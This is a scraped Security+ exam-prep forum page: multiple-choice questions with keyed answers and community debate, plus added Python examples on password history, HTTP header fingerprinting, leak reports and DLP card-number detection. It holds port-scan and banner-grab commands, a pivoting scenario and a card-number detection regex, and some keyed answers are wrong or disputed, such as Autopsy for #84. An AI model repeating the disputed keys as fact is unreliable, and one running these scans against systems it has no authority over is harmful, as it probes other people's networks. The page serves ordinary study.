This also would prevent a user from using the same compromised password too quickly. Once the password is compromised, hackers can try the old password months later to see if the user was dumb enough to use it again.
upvoted 1 times
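To show what the password-history control rodwave describes actually enforces, and how it combines with screening new passwords against a leaked list (the scenario in the question), here is an added Python example; it is not from the thread, from CompTIA, or from any product. The breach list, the history depth of 5 and the PBKDF2 work factor are constructed assumptions, and MFA, which several posters wanted among the options, is deliberately not modelled.

```python
"""Password history plus breached-password screening for an account store."""
import hashlib
import hmac
import os

HISTORY_DEPTH = 5          # current password plus the previous four (assumed policy value)
PBKDF2_ROUNDS = 100_000    # work factor for stored hashes (assumed)

# Constructed stand-in for the leaked public credential list, indexed by SHA-1
# the way breach-check services do; the cleartext list itself is never kept.
BREACHED_SHA1 = {
    hashlib.sha1(p.encode()).hexdigest()
    for p in ("Winter2022!", "Password123", "letmein")
}


def _hash(password: str, salt: bytes) -> bytes:
    """Salted PBKDF2-HMAC-SHA256; every stored entry has its own salt."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def is_breached(password: str) -> bool:
    return hashlib.sha1(password.encode()).hexdigest() in BREACHED_SHA1


class Account:
    """Holds the current password hash and the previous ones the policy remembers."""

    def __init__(self, username: str):
        self.username = username
        self.history = []  # (salt, hash) tuples, oldest first, current password last

    def _seen_before(self, password: str) -> bool:
        # Each entry has its own salt, so the candidate is re-derived per entry.
        return any(hmac.compare_digest(_hash(password, salt), h) for salt, h in self.history)

    def set_password(self, password: str) -> str:
        """Return 'ok' after changing the password, or a rejection reason."""
        if is_breached(password):
            return "rejected: password appears in a known breach"
        if self._seen_before(password):
            return f"rejected: matches one of your last {HISTORY_DEPTH} passwords"
        salt = os.urandom(16)
        self.history.append((salt, _hash(password, salt)))
        self.history = self.history[-HISTORY_DEPTH:]   # forget entries older than the policy
        return "ok"

    def check(self, password: str) -> bool:
        """Authenticate against the current (newest) entry only."""
        if not self.history:
            return False
        salt, h = self.history[-1]
        return hmac.compare_digest(_hash(password, salt), h)


if __name__ == "__main__":
    acct = Account("alice")
    print(acct.set_password("Winter2022!"))      # in the constructed breach list
    print(acct.set_password("Correct-Horse-9"))  # ok
    print(acct.set_password("Second-Pass-8"))    # ok
    print(acct.set_password("Correct-Horse-9"))  # in history
```

Two things worth noticing: the history is compared by re-deriving the candidate under each stored salt, so old hashes are never compared as raw strings, and the breach check runs before the history check, because a leaked password is rejected even if the user has never used it here before.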

bengy78 3 months ago
Selected Answer: C
It's an acceptable use policy violation. The users are using company passwords on external systems.
upvoted 4 times

Jossie_C 3 months ago
Selected Answer: B
It's not the other three.
upvoted 3 times

lordguck 3 months ago
Limited password lifetime or MFA would be the best answers here. Nevertheless I vote for A. My reasoning: the website password list was used for a dictionary attack on the company. Complexity requirements would reduce the risk that the password list produced "hits" on the company's accounts, which were not used on the hacked website.
upvoted 2 times

DALLASCOWBOYS 5 days, 21 hours ago
I was thinking same, but if the passwords were leaked, the passwords would be able to be seen, the complexity would not matter. I think B is
the better choice, with the reasoning that hopefully passwords were changed by the time they were leaked.
upvoted 1 times


CertAddict69 3 months, 3 weeks ago
Selected Answer: C
To me the Answer is C. Enforcing password history would not prevent the users from using the same password on multiple sites, which is what is
being implied here. An AUP (Acceptable Use Policy) Could at least hold users responsible for using the same password on multiple sites,
although would also not prevent them.
upvoted 2 times

andrizo 3 months, 3 weeks ago
You're thinking of a group policy. AUPs are only for prohibited websites and apps for personal use.
upvoted 2 times

FiendForce138 4 months, 1 week ago
Selected Answer: C
I agree with password history, but I am not convinced the public website and the business accounts are linked to the same company or entity. That said, password history controls would not come into play, as neither entity would know of the other's user password history. That said, the AUP would be able to address password reuse across unaffiliated accounts. That said, the question is poorly worded and needs revision.
upvoted 1 times

zf1343 1 week, 1 day ago
Password history relies on password expiration policy but we don't know if such policy exists! But the fact that they used company account
password in public sites, means current AUP policy (password section) needs to be added or updated.
upvoted 1 times

comeragh 4 months, 1 week ago
I agree with Password History here. I was looking for MFA among the list of answers!
upvoted 1 times

Jakalan7 4 months, 2 weeks ago
Selected Answer: B
MFA would be the optimal answer here, password reuse would be secondary - but since neither are available as answers, it has to be password
history.
upvoted 2 times

varun0 5 months ago
Selected Answer: B
Looks like they're reusing the passwords
upvoted 2 times


Question #83 Topic 1

A security analyst wants to fingerprint a web server. Which of the following tools will the security analyst MOST likely use to accomplish this task?

A. nmap -p1-65535 192.168.0.10

B. dig 192.168.0.10

C. curl --head http://192.168.0.10

D. ping 192.168.0.10

Correct Answer: C

Community vote distribution


C (71%) A (29%)

stoneface Highly Voted 5 months ago
Selected Answer: C
Agreed, for those wondering a curl --head 1.1.1.1 will output this :

HTTP/1.1 301 Moved Permanently
Server: cloudflare
Date: Thu, 01 Sep 2022 22:36:50 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Location: https://1.1.1.1/
CF-RAY: 74417cb04d6b9a50-MFE
upvoted 19 times

TinyTrexArmz 12 hours, 56 minutes ago
While nmap can be used to fingerprint a webserver, those are not the right parameters to do so. You would use nmap -sV <target> not -
p<port-range>
upvoted 1 times

Gravoc Highly Voted 4 months, 2 weeks ago
curl --head is similar to curl get. Remember from your studies that get is when a user/entity is requesting to get/download resources from a
server across the internet. Get requests include a header and a body. By doing curl --head, you're sending a request to get information from a
server. The server will reply by providing only the headers of the request, rather than including the body. Therefore a curl --head is a way to send
requests for header-only get requests. This allows people a quick summary of a response server, or in this case, to view its fingerprint.
upvoted 9 times

ronniehaang Most Recent 4 days, 16 hours ago
Selected Answer: A
The detailed analysis of services on a particular host is often called fingerprinting. This is because each OS or application software that underpins
a network service responds to probes in a unique way. This allows the scanning software to guess at the software name and version, without
having any sort of privileged access to the host. This can also be described as banner grabbing, where the banner is the header of the response
returned by the application.
Nmap is very widely used for this task, or you could use hping or Netcat.
upvoted 1 times

ronniehaang 4 days, 16 hours ago
A security analyst would most likely use the tool "nmap" to fingerprint a web server. The command "nmap -p1-65535 192.168.0.10" will scan
the target IP address (192.168.0.10) for open ports, which can provide information about the web server software and operating system being
used. The tool nmap is commonly used for network exploration, security auditing, and finding open ports and services on a target system.
upvoted 1 times

Sandon 2 weeks ago
Selected Answer: A
ChatGPT says it's A
upvoted 2 times

  P0wned 3 weeks, 2 days ago


Selected Answer: A
The security analyst will MOST likely use nmap -p1-65535 192.168.0.10 to fingerprint a web server.

nmap is a network exploration and security auditing tool that can be used to fingerprint a wide variety of network devices, including web servers.
The -p option tells nmap to scan only the specified ports (1-65535 in this case) rather than all ports. This command will give the analyst
information about the open ports and the services running on them.

dig is a command-line tool for querying DNS servers, it can give information about the DNS information but it doesn't fingerprint a web server.
Curl is a command-line tool for sending HTTP requests and it can give information about the HTTP headers, but it doesn't fingerprint a web
server.
Ping is a command-line tool for testing whether a particular host is reachable across an IP network, it can give information about reachability but
it doesn't fingerprint a web server.
upvoted 3 times

  bsComptia 2 weeks, 1 day ago


Agreed
A. nmap -pl-65535 192.168.0.10 is the most likely tool that a security analyst would use to fingerprint a web server. Nmap is a powerful tool
for network exploration, management, and security auditing, and can be used to fingerprint web servers to identify the operating system,
services running, and open ports.
Curl is a command-line tool for transferring data using various protocols, including HTTP. The `--head` option sends an HTTP request with the
`HEAD` method, which retrieves only the headers of the response, not the full response body. While this can provide some information about
the server, such as the server type, it is not as comprehensive as using a tool like nmap, which can provide more detailed information about
the server's operating system, services, and open ports.
Additionally, nmap can also be used to fingerprint the web server to identify the version of the web server software, and the available plugins,
which can be valuable information for identifying vulnerabilities and potential attack vectors.
upvoted 2 times
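The header-only reply discussed in this thread, as an added example that is not from the page or any commenter: it parses a constructed HEAD response the way a banner grab would read it, pulls out the headers that identify the software stack, and compares it with a reply from the same site after version banners were switched off. The response bytes and the list of identifying header names are constructed for the example.

```python
"""What a HEAD request reveals: the server returns the status line and headers
only, and those headers are often enough to fingerprint the software stack.
Added example for this thread; the two responses below are constructed, not
captured from a real host."""
import re

# Constructed reply from a server that advertises its software versions.
VERBOSE_HEAD_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Mon, 23 Jan 2023 10:00:00 GMT\r\n"
    b"Server: Apache/2.4.41 (Ubuntu)\r\n"
    b"X-Powered-By: PHP/7.4.3\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"Content-Length: 1532\r\n"
    b"\r\n"
)

# Constructed reply from the same site after version banners were switched off.
HARDENED_HEAD_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Mon, 23 Jan 2023 10:00:00 GMT\r\n"
    b"Server: Apache\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"Content-Length: 1532\r\n"
    b"\r\n"
)

# Response headers that commonly name the software and its version (assumed list).
FINGERPRINT_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "via")
VERSION_PATTERN = re.compile(r"\d+\.\d+")
STATUS_LINE = re.compile(r"^HTTP/\d\.\d (\d{3})\b")


def parse_head_response(raw):
    """Split a raw HEAD reply into (status_code, {header: value}).

    Header names are lower-cased because HTTP header names are
    case-insensitive. Anything after the blank line is rejected: a HEAD
    response carries no body, which is what makes it a cheap way to look at
    headers alone."""
    head, _, body = raw.partition(b"\r\n\r\n")
    if body:
        raise ValueError("HEAD response must not carry a body")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = STATUS_LINE.match(lines[0])
    if not status:
        raise ValueError("malformed status line: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            raise ValueError("malformed header line: %r" % line)
        headers[name.strip().lower()] = value.strip()
    return int(status.group(1)), headers


def fingerprint(raw):
    """Return the identifying headers and whether any of them leaks a version.

    Content-Length is reported separately: on a HEAD reply it describes the
    body a GET would have returned, so a non-zero value with an empty body
    is expected, not an error."""
    status, headers = parse_head_response(raw)
    identifying = {h: headers[h] for h in FINGERPRINT_HEADERS if h in headers}
    return {
        "status": status,
        "headers": identifying,
        "leaks_version": any(VERSION_PATTERN.search(v) for v in identifying.values()),
        "advertised_body_length": int(headers.get("content-length", "0")),
    }


if __name__ == "__main__":
    for label, raw in (("verbose", VERBOSE_HEAD_RESPONSE), ("hardened", HARDENED_HEAD_RESPONSE)):
        print(label, fingerprint(raw))
```

The hardened reply still names the product but no longer the version, which is the usual compromise: the protocol requires nothing in Server, but many deployments keep the name and drop the version string.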

  Lars87 4 months, 3 weeks ago


Selected Answer: C
C 100%
upvoted 1 times

  comeragh 5 months ago


Sorry, on review it seems C would be a better answer.
upvoted 1 times

  varun0 5 months ago


Selected Answer: C
curl command shown outputs fingerprint which is type and version of web server.
upvoted 2 times

  comeragh 5 months ago


Selected Answer: A
I would go with A here - NMAP
upvoted 3 times

  KetReeb 5 months ago


the command syntax is not correct for nmap.
upvoted 5 times

  lordguck 3 months ago


The syntax is correct: map all ports from 1-65535 on 192.168.0.10. C is correct as it is about a web server: web server fingerprinting is the
task of identifying the type and version of web server that a target is running on.
upvoted 2 times

  zf1343 1 week ago


No, there is a typo in "nmap -pl-65535 x.x.x.x" command. If you replace letter "I" with 1 or omit it, then nmap will work as an active
fingerprinting tool to scan all web server ports. "Curl --head" will provide OS web server type if it's not behind a WAF.
upvoted 1 times

Question #84 Topic 1

A penetration tester was able to compromise an internal server and is now trying to pivot the current session in a network lateral movement.
Which of the following tools, if available on the server, will provide the MOST useful information for the next assessment step?

A. Autopsy

B. Cuckoo

C. Memdump

D. Nmap

Correct Answer: A

Community vote distribution


D (97%)

  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: D
Autopsy is a digital forensics analysis tool - mainly targeted at hard drive analysis - not very helpful for the requirements

Nmap would be the correct answer. We want to pivot to other devices on the NETWORK, so the next step is to do reconnaissance, port scanning,
etc.
upvoted 18 times

  Demilitarized_zone Highly Voted  3 months, 1 week ago


WHY ARE THE ADMIN GIVING US WRONG ANSWERS PLEASE. THIS IS WICKED. COME ON
upvoted 15 times

  xxxdolorxxx Most Recent  2 weeks, 1 day ago


I vote for NMAP although I have no first hand experience with Autopsy.
upvoted 1 times

  mlonz 2 weeks, 2 days ago


"Which of the following tools, if available on the server " how come Nmap will be available on the server
upvoted 2 times

  jhfdkjshfkjdsho 1 month, 2 weeks ago


Selected Answer: A
Network Lateral Movement, or what is more commonly referred to simply as, “Lateral Movement”, refers to the techniques cyber attackers, or
“threat actors”, use to progressively move through a network as they search for the key data and assets that are ultimately the target of their
attack campaigns. So, It is not mapping the network
upvoted 1 times

  scarceanimal 15 hours, 5 minutes ago


The question calls for what the next step is, not the definition of network lateral movement.
upvoted 1 times

  Sandon 2 weeks ago


It's not A
upvoted 3 times

  tek7ila 2 months ago


Selected Answer: D
The rest of answers make no sense.
upvoted 1 times

  Queenica 2 months, 1 week ago


I chose NMAP, however how useful will NMAP be as the Pen-Tester is already INSIDE the network.
upvoted 1 times

  JaMorant 5 days, 8 hours ago


nmap helps with recon
upvoted 1 times

  rindrasakti 3 months, 3 weeks ago


Selected Answer: D
How come the answer is A? Who answered that?? Come on man... Autopsy is a digital forensics analysis tool. I vote for D
upvoted 1 times

  TinyTrexArmz 12 hours, 45 minutes ago


You can ignore the right answer as marked by the website. They would get into some trouble if they had all the right answers for you to grab.
Instead they have decent questions and promote discussion by us to come up with the correct answer.
upvoted 1 times

  Gravoc 4 months, 2 weeks ago


Nmap is basically mapping a network. The purpose of lateral pivoting is to gain a new perspective, or new information that will allow you to either
privilege escalate, or to achieve the goal of the attack. If the compromised server the pen tester is exploiting has nmap enabled, the pen tester
will be able to get an in-depth inside view of the internal network structure.

Autopsy doesn't make sense. It's used by forensics investigators to analyze tapes, drives, and save states. Why would a server have autopsy,
and how would autopsy assist in determining the next lateral move? It doesn't.
upvoted 2 times

  k9_462 5 months ago


Selected Answer: D
this is Nmap
upvoted 1 times

  Boogie_79 5 months ago


Selected Answer: D
Nmap specifically provides support for Network lateral movement activities.
upvoted 3 times

  kmanb 5 months, 1 week ago


Selected Answer: D
“Network lateral movement” nmap will help with that
upvoted 2 times

  YusufMadkour 5 months, 1 week ago


Selected Answer: D
Autopsy makes no sense in the context of assessing the next step. Nmap makes more sense as the pentester can use it to scan other devices on
the network to move laterally towards their target.
upvoted 2 times


Question #85 Topic 1

Field workers in an organization are issued mobile phones on a daily basis. All the work is performed within one city, and the mobile phones are
not used for any purpose other than work. The organization does not want these phones used for personal purposes. The organization would like
to issue the phones to workers as permanent devices so the phones do not need to be reissued every day. Given the conditions described, which
of the following technologies would BEST meet these requirements?

A. Geofencing

B. Mobile device management

C. Containerization

D. Remote wiping

Correct Answer: B

Community vote distribution


B (100%)

  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: B
MDM is the best solution here, Company wants to issue a COBO device therefore no containerization < - tailored to BYOD

Geofencing and remote wiping are capabilities that are provided by an MDM solution
upvoted 7 times

  Sir_Learnalot Most Recent  2 months, 3 weeks ago


Selected Answer: B
MDM will do the job
upvoted 1 times

  grinop 3 months, 2 weeks ago


I agree that MDM is correct. The question almost tricked me into selecting geofencing; however, MDM is best suited since geofencing would only
accomplish limiting location.
upvoted 2 times

  scarceanimal 15 hours, 1 minute ago


yes, after all they can still use it for personal use within geofencing perimeters. mdm will prevent that
upvoted 1 times

  Bob455 4 months, 1 week ago


A. An MDM would be used if the org was concerned about the users using the devices for other purposes, but the question states they are not,
and it gives a geographical clue with "users work in one city"
upvoted 1 times

  redsidemanc2 4 months, 4 weeks ago


MDM is best solution.
MDM provides the other 3 in one solution
upvoted 1 times

  comeragh 5 months ago


Selected Answer: B
Agree with B - MDM as being correct answer here
upvoted 2 times

  Boogie_79 5 months ago


Selected Answer: B
agreed
upvoted 2 times


Question #86 Topic 1

Which of the following control types is focused primarily on reducing risk before an incident occurs?

A. Preventive

B. Deterrent

C. Corrective

D. Detective

Correct Answer: A

Community vote distribution


A (85%) B (15%)

  cozzmo Highly Voted  4 months, 3 weeks ago


Selected Answer: A
Yay.. finally one that makes sense!
upvoted 8 times

  carpathia Highly Voted  4 months, 3 weeks ago


Selected Answer: A
"Preventive controls act before an event, preventing it from advancing". Deterrent - "acts to discourage the attacker by reducing the likelhood of
success from the perspective of the attacker".
upvoted 6 times

  ScottT 4 months, 3 weeks ago


https://www.sciencedirect.com/topics/computer-science/preventative-control
upvoted 1 times

  DALLASCOWBOYS Most Recent  5 days, 20 hours ago


A. Preventive controls stop a security issue before it occurs.
upvoted 1 times

  sanlibo 2 weeks, 2 days ago


Selected Answer: A
Preventive—the control acts to eliminate or reduce the likelihood that an attack can
succeed. A preventative control operates BEFORE an attack can take place.
upvoted 1 times

  FMMIR 2 months, 1 week ago


Selected Answer: A
preventive controls are controls intended to completely avoid an incident from being able to occur. Deterrent controls, alternatively, are intended
to discourage a bad actor from an unlawful activity that they had originally intended to perform.
upvoted 1 times

  okay123 2 months, 3 weeks ago


Selected Answer: A
Deterrent controls reduce the likelihood of a deliberate attack. Preventative controls protect vulnerabilities and make an attack unsuccessful or
reduce its impact.

https://www.sciencedirect.com/topics/computer-science/deterrent-
control#:~:text=Deterrent%20controls%20reduce%20the%20likelihood%20of%20a%20deliberate%20attack.&text=Preventative%20controls%
20protect%20vulnerabilities%20and,unsuccessful%20or%20reduce%20its%20impact.

So A ("reducing risk")
upvoted 1 times

  Halaa 4 months, 3 weeks ago


Selected Answer: B
reducing risk before it happens--deterrent
upvoted 3 times

  Jakalan7 4 months, 2 weeks ago


I can see where you are coming from, but they are asking what reduces risk - so the answer has to be A. Deterrents are " intended to
discourage someone from doing something", they don't actually prevent a risk though. For example, a fence is a deterrent, but people can still
get a ladder and climb over it, it does not reduce the risk.
upvoted 4 times


  zf1343 1 week ago


Question says it's "focused primarily on reducing". Preventive controls primarily function as preventive control not reducing.
upvoted 1 times

  Libraboy 3 months, 2 weeks ago


A fence reduces the number of people that will be hoping to break in. In this case, a preventive measure would be an electric fence.
upvoted 3 times


Question #87 Topic 1

A systems administrator reports degraded performance on a virtual server. The administrator increases the virtual memory allocation, which
improves conditions, but performance degrades again after a few days. The administrator runs an analysis tool and sees the following output:
==3214== timeAttend.exe analyzed
==3214== ERROR SUMMARY:
==3214== malloc/free: in use at exit: 4608 bytes in 18 blocks.
==3214== checked 82116 bytes
==3214== definitely lost: 4608 bytes in 18 blocks.
The administrator terminates the timeAttend.exe, observes system performance over the next few days, and notices that the system performance
does not degrade. Which of the following issues is MOST likely occurring?

A. DLL injection

B. API attack

C. Buffer overflow

D. Memory leak

Correct Answer: D

Community vote distribution


D (100%)

  stoneface Highly Voted  5 months ago


Selected Answer: D
Definitely memory leak ' key sentence' -> The administrator increases the virtual memory allocation, which improves conditions, but performance
degrades again after a few days.
A memory leak occurs when programmers create memory in the heap and forget to delete it.

The consequence of a memory leak is that it reduces the performance of the computer by reducing the amount of available memory. Eventually, in
the worst case, too much of the available memory may become allocated and all or part of the system or device stops working correctly, the
application fails, or the system slows down vastly.
upvoted 58 times

  Gino_Slim 3 months, 2 weeks ago


Stoneface will help you pass this everyone (lol)
upvoted 15 times

  ronniehaang Most Recent  4 days, 16 hours ago


Selected Answer: D
The issue that is most likely occurring is a memory leak. A memory leak occurs when a program allocates memory dynamically, but does not free
it properly. Over time, this results in a gradual increase in memory usage, leading to degraded system performance and eventually to a crash. The
output from the analysis tool shows that timeAttend.exe is the cause of the memory leak, as it has 4608 bytes in 18 blocks of memory that are
definitely lost. Terminating the timeAttend.exe process and observing improved system performance confirms this diagnosis.
upvoted 1 times
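An added example, not part of the question or of any comment, that reads the kind of leak-checker summary quoted in the question and turns it into a verdict: the "definitely lost" counters say what was never freed, and the bytes-per-block ratio (4608 / 18 = 256) shows that the same allocation size was lost 18 times, which is what a forgotten free in a repeated code path looks like. LEAK_REPORT is the text from the question; CLEAN_REPORT is a constructed run with nothing lost.

```python
"""Parse a leak-checker summary of the form shown in the question and decide
whether it indicates a memory leak. Added example; LEAK_REPORT is the output
quoted in the question, CLEAN_REPORT is constructed for comparison."""
import re

LEAK_REPORT = """\
==3214== timeAttend.exe analyzed
==3214== ERROR SUMMARY:
==3214== malloc/free: in use at exit: 4608 bytes in 18 blocks.
==3214== checked 82116 bytes
==3214== definitely lost: 4608 bytes in 18 blocks.
"""

# Constructed report for a process that released everything before exit.
CLEAN_REPORT = """\
==4001== payroll.exe analyzed
==4001== ERROR SUMMARY:
==4001== malloc/free: in use at exit: 0 bytes in 0 blocks.
==4001== checked 90112 bytes
==4001== definitely lost: 0 bytes in 0 blocks.
"""

REPORT_LINE = re.compile(r"^==(\d+)==\s*(.*?)\s*$")
BYTES_BLOCKS = re.compile(r"(\d+) bytes in (\d+) blocks")
CHECKED = re.compile(r"checked (\d+) bytes")


def _bytes_blocks(body):
    """Pull '<n> bytes in <m> blocks' out of a summary line."""
    m = BYTES_BLOCKS.search(body)
    if not m:
        raise ValueError("expected '<n> bytes in <m> blocks' in %r" % body)
    return int(m.group(1)), int(m.group(2))


def parse_report(text):
    """Extract pid, program name and the three counters from the summary.
    Lines without the ==pid== prefix (or unknown lines) are ignored."""
    report = {"pid": None, "program": None, "in_use_at_exit": None,
              "checked_bytes": None, "definitely_lost": None}
    for line in text.splitlines():
        m = REPORT_LINE.match(line)
        if not m:
            continue
        report["pid"] = int(m.group(1))
        body = m.group(2)
        if body.endswith(" analyzed"):
            report["program"] = body[: -len(" analyzed")]
        elif body.startswith("malloc/free: in use at exit:"):
            report["in_use_at_exit"] = _bytes_blocks(body)
        elif body.startswith("definitely lost:"):
            report["definitely_lost"] = _bytes_blocks(body)
        elif CHECKED.match(body):
            report["checked_bytes"] = int(CHECKED.match(body).group(1))
    return report


def diagnose(text):
    """Return a verdict: leak flag, lost totals and the average lost block size."""
    report = parse_report(text)
    lost_bytes, lost_blocks = report["definitely_lost"] or (0, 0)
    return {
        "program": report["program"],
        "leak": lost_blocks > 0,
        "lost_bytes": lost_bytes,
        "lost_blocks": lost_blocks,
        # A uniform block size points at one allocation repeated without a free.
        "avg_block_bytes": lost_bytes // lost_blocks if lost_blocks else 0,
        # Everything still in use at exit being unreachable means none of it
        # was a deliberate long-lived allocation: it all leaked.
        "all_in_use_is_lost": lost_blocks > 0
        and report["in_use_at_exit"] == report["definitely_lost"],
    }


if __name__ == "__main__":
    print(diagnose(LEAK_REPORT))
    print(diagnose(CLEAN_REPORT))
```

A leak that grows with uptime matches the symptom in the question: adding virtual memory only delays the point at which the process exhausts it, and killing the process releases everything at once.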

  jjhidalgo21 2 months ago


WHO IS STONEFACE?
upvoted 2 times

  MusaKeita 3 months, 2 weeks ago


memory leak
upvoted 1 times

  MarciaL 3 months, 2 weeks ago


I think B. API attack
upvoted 1 times

  Wanafresh 4 months ago


Memory leaks are usually caused by failure to deallocate memory that has been allocated.
upvoted 2 times

  cozzmo 4 months, 3 weeks ago


Thank you Stoneface!
upvoted 2 times

  comeragh 5 months ago


Well spotted stoneface. Agree with you on D for this one.


upvoted 2 times

Question #88 Topic 1

An administrator is experiencing issues when trying to upload a support file to a vendor. A pop-up message reveals that a payment card number
was found in the file, and the file upload was blocked. Which of the following controls is most likely causing this issue and should be checked
FIRST?

A. DLP

B. Firewall rule

C. Content filter

D. MDM

E. Application allow list

Correct Answer: A

Community vote distribution


A (100%)

  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: A
DLP - Data Loss Prevention uses exact data matching or regex matching - in this case a regex rule for detecting credit card numbers could be in
place that is actively blocking the upload of the document.

Regex for detecting an Amex card: ^3[47][0-9]{13}$

Source https://stackoverflow.com/questions/9315647/regex-credit-card-number-tests
upvoted 23 times
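An added example, not from the page or from stoneface, of the check a DLP rule like the one described above performs on a file before it leaves: a regex finds digit strings that look like card numbers, and each candidate is confirmed with the Luhn check digit that card numbers carry, so an order reference with the same number of digits does not trigger a false block. The Amex pattern is the regex quoted in the comment; the Visa and Mastercard patterns, the helper names and the support file text are constructed for the example.

```python
"""DLP-style check for payment card numbers in a file about to be uploaded.
Pattern matching alone over-matches (order numbers, phone numbers), so each
candidate is confirmed with the Luhn check digit that card numbers carry.
Added example for this thread; the support file text is constructed."""
import re

# Candidate: 13 to 19 digits, optionally separated by single spaces or dashes,
# not glued to other digits on either side.
CARD_CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")
SEPARATORS = re.compile(r"[ -]")

# Issuer patterns applied to the bare digit string. The Amex one is the regex
# quoted in the comment above; the other two are added for the example.
ISSUER_PATTERNS = {
    "amex": re.compile(r"^3[47][0-9]{13}$"),
    "visa": re.compile(r"^4[0-9]{12}(?:[0-9]{3})?$"),
    "mastercard": re.compile(r"^5[1-5][0-9]{14}$"),
}


def luhn_valid(digits):
    """Luhn mod-10 check: double every second digit from the right, fold
    two-digit results back to one digit, require the sum to be a multiple of 10."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def classify(candidate):
    """Return the issuer name for a Luhn-valid card number, else None."""
    digits = SEPARATORS.sub("", candidate)
    if not luhn_valid(digits):
        return None
    for issuer, pattern in ISSUER_PATTERNS.items():
        if pattern.match(digits):
            return issuer
    return "unknown-issuer"


def find_card_numbers(text):
    """List (digits, issuer) for every confirmed card number in the text."""
    hits = []
    for m in CARD_CANDIDATE.finditer(text):
        issuer = classify(m.group())
        if issuer:
            hits.append((SEPARATORS.sub("", m.group()), issuer))
    return hits


def redact(text):
    """Mask confirmed card numbers down to their last four digits."""
    def mask(m):
        if classify(m.group()) is None:
            return m.group()          # not a card number, leave it alone
        digits = SEPARATORS.sub("", m.group())
        return "*" * (len(digits) - 4) + digits[-4:]
    return CARD_CANDIDATE.sub(mask, text)


def should_block_upload(text):
    """The policy decision a DLP agent would make before the file leaves."""
    return bool(find_card_numbers(text))


# Constructed support file: two publicly known test card numbers and a
# 16-digit order reference that is not a card number.
SAMPLE_SUPPORT_FILE = (
    "Ticket 48213 - checkout page crashes after payment\n"
    "Order ref: 1234 5678 9012 3456\n"
    "Customer paid with card 4111 1111 1111 1111, expiry 12/25\n"
    "Alternate card on file: 378282246310005\n"
    "Callback number: 555-0100\n"
)

if __name__ == "__main__":
    print(find_card_numbers(SAMPLE_SUPPORT_FILE))
    print("block upload:", should_block_upload(SAMPLE_SUPPORT_FILE))
    print(redact(SAMPLE_SUPPORT_FILE))
```

In the scenario from the question the administrator's fix is the redact step: strip the card numbers from the support file and the upload passes, which is the control working as intended rather than a firewall or filter misconfiguration.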

  KingDrew Most Recent  3 weeks, 1 day ago


Selected Answer: A
DLP keeps sensitive data such as PHI, PII, and PCI-DSS secure from escaping the network or being leaked.
upvoted 2 times

  learnNcurve 2 months, 1 week ago


Selected Answer: A
A data loss prevention (DLP) device can reduce the risk of employees emailing confidential information outside the organization
upvoted 1 times

  comeragh 5 months ago


Selected Answer: A
Agree with DLP being the correct answer here
upvoted 2 times


Question #89 Topic 1

Which of the following risk management strategies would an organization use to maintain a legacy system with known risks for operational
purposes?

A. Acceptance

B. Transference

C. Avoidance

D. Mitigation

Correct Answer: A

Community vote distribution


A (76%) D (24%)

  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: A
Accepting risk, or risk acceptance, occurs when a business or individual acknowledges that the potential loss from a risk is not great enough to
warrant spending money to avoid it.
upvoted 22 times

  Gino_Slim 3 months, 2 weeks ago


In stoneface we trust
upvoted 7 times

  scarceanimal Most Recent  14 hours, 37 minutes ago


Selected Answer: D
question asks what they'd use to *maintain*. They're accepting residual risk with the fact that they're using a legacy system, but they intend to
actually use it and maintain it for operational purposes. Mitigation and acceptance of the residual risk is the right call here.
upvoted 1 times

  DALLASCOWBOYS 5 days, 20 hours ago


A. Acceptance. The organization has chosen to accept the risk because the risk is known.
upvoted 1 times

  sanlibo 2 weeks, 2 days ago


Selected Answer: A
Risk acceptance (or tolerance) means that no countermeasures are put in place either
because the level of risk does not justify the cost or because there will be unavoidable
delay before the countermeasures are deployed. In this case, you should continue to
monitor the risk (as opposed to ignoring it).
upvoted 1 times

  Boubou480 4 weeks, 1 day ago


Selected Answer: D
Answer is D) Mitigation
When risk is accepted, there is no further action.
When risk is identified and must be treated, the next course of action is Mitigation.
upvoted 1 times

  alwaysrollin247 1 month, 2 weeks ago


Selected Answer: A
The key word in the question is "Legacy". Legacy equipment is no longer supported by the vendor, which means no new patches will ever be
released for this equipment again, there is no mitigation here. If a company is using legacy equipment with known risks, they have accepted
those risks.
upvoted 2 times

  okay123 1 month, 3 weeks ago


Selected Answer: D
The risks need to be mitigated, not just accepted.
upvoted 2 times

  GMuney 2 months, 2 weeks ago


Selected Answer: D
I agree with Mitigation since the company wants to "maintain" the legacy system. I interpret that as doing what they can to use that system rather
than just accept the risks and do nothing about it. There isn't enough information in the question to determine whether these risks can be
mitigated or not though.
upvoted 1 times
  bengy78 2 months, 2 weeks ago
Selected Answer: D
It's risk mitigation per CompTIA CertMaster: "Patch management can also be difficult for legacy systems, proprietary systems, and systems from
vendors without robust security management plans, such as some types of Internet of Things devices. These systems will need compensating
controls, or some other form of risk mitigation if patches are not readily available."
upvoted 1 times

  G4ct756 3 months, 2 weeks ago


Selected Answer: D
Why not Mitigation, and accept the residual risk? Seems more practical than acceptance.
upvoted 2 times

  Sandon 2 weeks ago


In the end you still have to accept the risk of maintaining a legacy system.
upvoted 1 times

  Oval61251 3 months, 1 week ago


My thoughts too
upvoted 1 times

  Fastytop 3 months, 3 weeks ago


Transference risk control strategy occurs when an organization decides to deflect a risk it encounters to another organization. you must think
about this option.B
upvoted 2 times

  Gino_Slim 3 months, 2 weeks ago


That has nothing to do with what was asked my boy
upvoted 3 times

  comeragh 5 months ago


Selected Answer: A
Agree with A being the correct answer here
upvoted 1 times


Question #90 Topic 1

Which of the following is the BEST action to foster a consistent and auditable incident response process?

